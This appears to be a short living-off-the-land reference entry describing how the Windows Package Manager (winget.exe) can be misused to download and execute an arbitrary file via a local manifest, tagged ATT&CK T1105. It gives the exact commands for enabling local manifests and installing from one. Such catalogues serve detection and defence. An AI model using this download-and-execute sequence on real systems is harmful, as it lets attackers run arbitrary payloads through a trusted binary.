.. /winget.exe
Star

Execute

Windows Package Manager tool


Paths:

Resources:
Acknowledgements:

Detection:

Execute

  1. Downloads a file from the web address specified in manifest.yml and executes it on the system. Local manifest setting must be enabled in winget for it to work: "winget settings --enable LocalManifestFiles"

    winget.exe install --manifest manifest.yml
    Use case
    Download and execute an arbitrary file from the internet
    Privileges required
    Local Aministrator - required to enabled local manifest setting
    Operating systems
    Windows 10, Windows 11
    ATT&CK® technique
    T1105